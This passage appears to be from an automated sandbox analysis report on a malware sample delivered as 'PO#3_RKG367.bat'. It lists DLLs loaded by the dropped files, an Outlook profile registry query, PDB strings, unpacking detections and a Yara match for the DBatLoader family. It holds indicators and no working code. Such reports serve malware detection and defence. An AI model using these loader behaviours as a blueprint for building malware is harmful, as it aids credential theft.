                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: apphelp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: version.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: uxtheme.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: url.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieframe.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: iertutil.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: netapi32.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: userenv.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winhttp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wkscli.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: netutils.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: amsi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: kernel.appcore.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winmm.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wininet.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sspicli.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: windows.storage.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: wldp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: profapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mswsock.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: iphlpapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winnsi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??????????.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ????.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???e???????????.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ???e???????????.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: tquery.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptdll.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppwmi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: slc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppcext.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: winscard.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: devobj.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptsp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: rsaenh.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: cryptbase.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: kernel.appcore.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: uxtheme.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: mscoree.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wldp.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: amsi.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: userenv.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: profapi.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: version.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: gpapi.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptsp.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: rsaenh.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptbase.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.storage.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: textshaping.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: textinputframework.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: coreuicomponents.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: coremessaging.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ntmarta.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: coremessaging.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dll
                      Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: apihost.exe.lnk.12.drLNK file: ..\..\..\..\..\ACCApi\apihost.exe
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifAutomated click: OK
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: PO#3_RKG367.batStatic file information: File size 2158506 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000002.2716549443.000000002FFA9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, 00000006.00000002.2533914896.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020A79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC50000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A16000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb source: rpkhzpuO.pif, 0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2741756362.00000000343B0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2718853988.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000003.2609245491.000000002FFBA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2740855997.0000000032F75000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2881899810.0000000026485000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2869962358.00000000250F0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2869415210.0000000024E93000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000003.2636484466.000000002FFF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000002.2716549443.000000002FFDB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000006.00000003.2437138708.0000000021B12000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437138708.0000000021B41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020A79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC50000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588114567.0000000000822000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588114567.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A16000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000019.00000003.2749710698.0000000000723000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000019.00000003.2749710698.00000000006FA000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 24.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 29.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 24.2.rpkhzpuO.pif.400000.0.unpack
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 29.2.rpkhzpuO.pif.400000.0.unpack
                      Yara detected DBatLoader
                      Source: Yara matchFile source: 6.2.x.exe.2c30000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.x.exe.22665a8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.x.exe.22665a8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.2536406675.000000007FAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2464206701.0000000002266000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000001.2446233147.00000000013E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: rpkhzpuO.pif.6.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C487A0 LoadLibraryW,GetProcAddress,FreeLibrary,6_2_02C487A0
